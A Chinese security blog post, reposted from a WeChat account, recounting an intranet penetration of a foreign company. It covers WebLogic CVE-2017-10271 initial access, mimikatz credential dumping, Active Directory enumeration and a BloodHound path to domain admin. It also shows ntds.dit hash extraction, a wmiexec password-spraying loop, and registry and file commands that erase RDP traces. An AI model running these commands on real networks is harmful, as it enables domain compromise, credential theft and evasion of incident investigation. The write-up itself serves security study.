对某外企的一次内网渗透复盘(三)

admin
admin
admin
138876
文章
114
评论
2022年8月4日11:04:57评论86 views字数 1977阅读6分35秒阅读模式

0x01 外网到Shell

目标站界面:

对某外企的一次内网渗透复盘(三)

通过子域名,找到分站,C段里面有一个安装Weblogic的服务器,通过CVE-2017-10271拿下并上传webshell。

http://xxx:xxxx//wls-wsat/xxx.jsp

对某外企的一次内网渗透复盘(三)


0x02 内网信息收集

主机信息收集:

对某外企的一次内网渗透复盘(三)

查看机器网卡情况。

存在域:xxx.local
当前内网ip段:10.100.20.0/24

查看当前机器是否出网。

对某外企的一次内网渗透复盘(三)

查看当前主机是否存在杀软,也是个老牌杀软ESET NOD32,国外经常用这个,这次不用CS和MSF打。

对某外企的一次内网渗透复盘(三)

查看当前机器安装的软件(不知道为什么没有回显,写入文件也没有。

wmic product get name,version

查看当前机器的详细信息,171个补丁。。。

对某外企的一次内网渗透复盘(三)

抓取密码,使用Prodump+mimikatz导出lsass.exe存储的密码,获得账号密码,看样子有大哥来过,修改过注册表,不然windows server 2021抓不到明文密码,我们再搞一遍。

对某外企的一次内网渗透复盘(三)

PRINCHEALTHpsvadmin:xxxxx
PSVHR-APPPRODoracle:xxxx

查看是否在域内。

net time /domain

域用户+域机器,舒服。

对某外企的一次内网渗透复盘(三)

查看当前机器与其它机器建立的ipc连接。

net use

对某外企的一次内网渗透复盘(三)

域信息收集:
查看当前域管理员组,发现psvadmin为域管理员。

net group "Domain admins" /domain

对某外企的一次内网渗透复盘(三)

查询信任域。

nltest /domain_trusts

对某外企的一次内网渗透复盘(三)

pxxxxxxx.local为主域
pxx.local为子域

定位域控机器

nltest /dclist:domainname

对某外企的一次内网渗透复盘(三)其中HWC-ADSRV-P01为主域控机器,但没有找到子域的域控。

对某外企的一次内网渗透复盘(三)

查询主域控机器的ip地址。

ping HWC-ADSRV-P01

对某外企的一次内网渗透复盘(三)

通过spn查询域pxxxxxxx.local结构。

setspn -T pxxxxxxx.local -Q */* >spn.txt

对某外企的一次内网渗透复盘(三)

并统计域内主机数量,好家伙,3167台。

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

对某外企的一次内网渗透复盘(三)

spn看起来太麻烦了,所以使用ADExplorer连接域控机器并导出域结构,ADExplorerSnapshot.py转换json格式,并将其导入Bloodhound,进行可视化分析,3113台机器,4897个用户。

对某外企的一次内网渗透复盘(三)

当前用户是psvadmin,我们的目标是域控机器的最高权限,再Bloodhound中填入开始节点为psvadmin用户和目标节点为域控机器名,它会为我们规划出一条攻击路径。

对某外企的一次内网渗透复盘(三)

我们可以看到psvadmin用户是域管理员组的一名成员,比较简单,所以直接可以登录域控机器。


0x03 隧道搭建

Neo-reGeorg、Venom都被杀,frp不杀,很奇怪,出网使用frp反向代理搭建隧道。

对某外企的一次内网渗透复盘(三)

对某外企的一次内网渗透复盘(三)

对某外企的一次内网渗透复盘(三)


0x04 域渗透

当前为C类ip段,Ladon扫描内网存活主机。

对某外企的一次内网渗透复盘(三)

隧道已经搭建好了,拥有域管理员psvadmin明文账号密码,直接远程登录主域控机器。

对某外企的一次内网渗透复盘(三)

接下来就是使用NTDSUTIL拍摄ntds.dit的快照,使用NTDSDumpEx导出该域用户的全部hash即可。
最后使用wmiexec进行密码喷洒即可。

FOR /F %i in (ip.txt) do wmiexec Pxxxxxxx/psvadmin:xxxxxxx@%i whoami

对某外企的一次内网渗透复盘(三)

到这里这个域基本被打穿。


0x05 痕迹清理

远程登录了主域控机器:172.21.2.2。清理3389日志。

//删除注册表
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"

//删除缓存文件
cd %userprofile%documents
attrib Default.rdp -s -h
del Default.rdp

清除recent。

del /f /s /q “%userprofile%Recent*.*

最后清除在边界机器里上传的工具与脚本并清除日志。


From:https://hui-blog.cool/posts/9ef8.html

往期推荐 

// 1

对某外企的一次内网渗透复盘(二)

// 2

对某外企的一次内网渗透复盘(一)

// 3

浅谈Web安全从SOP到CORS跨域再到CSP

// 4

| 简单实现程序DLL劫持

原文始发于微信公众号(巡安似海):对某外企的一次内网渗透复盘(三)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月4日11:04:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   对某外企的一次内网渗透复盘(三)https://cn-sec.com/archives/1221116.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息